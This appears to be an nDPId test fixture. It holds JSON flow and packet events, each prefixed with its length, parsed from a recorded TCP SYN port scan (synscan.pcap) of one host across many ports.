+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1708,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1698,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061002,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7402,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1708,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1698,"flow_packet_id":1,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061002,"pkt":"ACYLMQczACWzv5HuCABFAAAs3MMAACkGQq+sEAAIQA2GNIzSHOrdUoMYAAAAAGACCAATpQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1709,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1699,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061002,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4321,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1709,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1699,"flow_packet_id":1,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061002,"pkt":"ACYLMQczACWzv5HuCABFAAAslgAAAC4GhHKsEAAIQA2GNIzSEOHdUoMYAAAAAGACDAAbrgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1710,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1700,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061003,"flow_last_seen":1278275061003,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061003,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5859,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1710,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1700,"flow_packet_id":1,"flow_last_seen":1278275061003,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061003,"pkt":"ACYLMQczACWzv5HuCABFAAAsAEUAADYGEi6sEAAIQA2GNIzTFuPdU4MZAAAAAGACDAAVqQAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1711,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1701,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061003,"flow_last_seen":1278275061003,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061003,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":33,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1711,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1701,"flow_packet_id":1,"flow_last_seen":1278275061003,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061003,"pkt":"ACYLMQczACWzv5HuCABFAAAsKngAACUG+PqsEAAIQA2GNIzTACHdU4MZAAAAAGACCAAwawAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1712,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1702,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":668,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1712,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1702,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAswesAADIGVIesEAAIQA2GNIzTApzdU4MZAAAAAGACDAAp8AAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1713,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1703,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":18988,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1713,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1703,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAsb6EAADgGoNGsEAAIQA2GNIzTSizdU4MZAAAAAGACBADqXwAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1714,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1704,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1213,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1714,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1704,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAsT8MAACoGzq+sEAAIQA2GNIzTBL3dU4MZAAAAAGACDAAnzwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1715,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1705,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2105,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1715,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1705,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAsp3EAADEGcAGsEAAIQA2GNIzTCDndU4MZAAAAAGACCAAoUwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1716,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1706,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1716,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1706,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAsVcwAACoGyKasEAAIQA2GNIzTIyjdU4MZAAAAAGACDAAJZAAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1717,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1707,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":161,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1717,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1707,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAsoF8AADMGdROsEAAIQA2GNIzTAKHdU4MZAAAAAGACEAAn6wAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1718,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1708,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9535,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1718,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1708,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAsIgcAADcG72usEAAIQA2GNIzTJT\/dU4MZAAAAAGACEAADTQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1719,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1709,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1719,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1709,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAsK00AACcG9iWsEAAIQA2GNIzTw1PdU4MZAAAAAGACEABlOAAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1720,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1710,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1720,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1710,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAscdYAADoGnJysEAAIQA2GNIzTB9DdU4MZAAAAAGACDAAkvAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1721,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1711,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3324,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1721,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1711,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAskloAADsGexisEAAIQA2GNIzTDPzdU4MZAAAAAGACEAAbkAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1722,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1712,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1090,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1722,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1712,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAsQgQAACwG2m6sEAAIQA2GNIzTBELdU4MZAAAAAGACBAAwSgAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1723,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1713,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8254,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1723,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1713,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAslhYAADkGeVysEAAIQA2GNIzTID7dU4MZAAAAAGACCAAQTgAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1724,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1714,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49159,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1724,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1714,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAsJNMAACgG+5+sEAAIQA2GNIzTwAfdU4MZAAAAAGACBAB0hAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1725,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1715,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1755,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1725,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1715,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAsuDsAACYGajesEAAIQA2GNIzTBtvdU4MZAAAAAGACDAAlsQAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1726,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1716,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":880,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1726,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1716,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAsO7gAADEG27qsEAAIQA2GNIzTA3DdU4MZAAAAAGACCAAtHAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1727,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1717,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":555,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1727,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1717,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAsa3wAACkGs\/asEAAIQA2GNIzTAivdU4MZAAAAAGACCAAuYQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1728,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1718,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5904,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1728,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1718,"flow_packet_id":1,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061006,"pkt":"ACYLMQczACWzv5HuCABFAAAsf5AAAC0Gm+KsEAAIQA2GNIzTFxDdU4MZAAAAAGACCAAZfAAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1729,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1719,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3920,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1729,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1719,"flow_packet_id":1,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061006,"pkt":"ACYLMQczACWzv5HuCABFAAAszRsAACoGUVesEAAIQA2GNIzTD1DdU4MZAAAAAGACDAAdPAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1730,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1720,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13722,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1730,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1720,"flow_packet_id":1,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061006,"pkt":"ACYLMQczACWzv5HuCABFAAAsbKUAADIGqc2sEAAIQA2GNIzTNZrdU4MZAAAAAGACDAD28QAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1731,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1721,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1074,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1731,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1721,"flow_packet_id":1,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061006,"pkt":"ACYLMQczACWzv5HuCABFAAAsvVQAAC4GXR6sEAAIQA2GNIzTBDLdU4MZAAAAAGACDAAoWgAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1732,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1722,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":777,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 